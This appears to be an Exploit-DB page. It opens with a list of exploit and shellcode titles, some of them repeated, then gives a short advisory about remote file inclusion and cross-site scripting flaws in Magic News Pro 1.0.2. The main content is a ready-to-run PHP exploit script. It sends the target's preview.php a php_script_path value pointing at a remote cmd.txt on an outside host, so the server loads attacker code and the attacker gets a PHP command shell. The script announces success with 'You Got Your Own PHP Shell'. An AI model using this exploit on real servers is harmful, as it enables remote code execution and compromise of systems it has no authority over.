880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
75 lines
No EOL
2.7 KiB
PHP
75 lines
No EOL
2.7 KiB
PHP
source: https://www.securityfocus.com/bid/22661/info
|
|
|
|
Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities.
|
|
|
|
An attacker can exploit these issues to execute arbitrary PHP code in the context of the webserver process or to steal cookie-based authentication credentials. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
These issues affects version 1.0.2; other versions may also be vulnerable.
|
|
|
|
#!/usr/bin/php -q -d short_open_tag=on
|
|
<?
|
|
/*
|
|
/* Magic News PHP Code Execution Exploit
|
|
/* This exploit should allow you to execute commands
|
|
/* By : HACKERS PAL
|
|
/* WwW.SoQoR.NeT
|
|
*/
|
|
print_r('
|
|
/**********************************************/
|
|
/* Magic News Command Execution */
|
|
/* by HACKERS PAL <security@soqor.net> */
|
|
/* site: http://www.soqor.net */');
|
|
if ($argc<2) {
|
|
print_r('
|
|
/* -- */
|
|
/* Usage: php '.$argv[0].' host
|
|
/* Example: */
|
|
/* php '.$argv[0].' http://localhost/
|
|
/**********************************************/
|
|
');
|
|
die;
|
|
}
|
|
error_reporting(0);
|
|
ini_set("max_execution_time",0);
|
|
|
|
$url=$argv[1]."/";
|
|
$exploit="preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor";
|
|
$page=$url.$exploit;
|
|
Function get_page($url)
|
|
{
|
|
|
|
if(function_exists("file_get_contents"))
|
|
{
|
|
|
|
$contents = file_get_contents($url);
|
|
|
|
}
|
|
else
|
|
{
|
|
$fp=fopen("$url","r");
|
|
while($line=fread($fp,1024))
|
|
{
|
|
$contents=$contents.$line;
|
|
}
|
|
|
|
|
|
}
|
|
return $contents;
|
|
}
|
|
|
|
$newpage = get_page($page);
|
|
|
|
if(eregi("Cannot execute a blank command",$newpage))
|
|
{
|
|
Die("\n[+] Exploit Finished\n[+] Go To :
|
|
".$url."preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor\n[+]
|
|
You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT
|
|
*/\n/**********************************************/");
|
|
}
|
|
Else
|
|
{
|
|
Die("\n[-] Exploit Failed\n/* Visit us :
|
|
WwW.SoQoR.NeT
|
|
*/\n/**********************************************/");
|
|
}
|
|
?>
|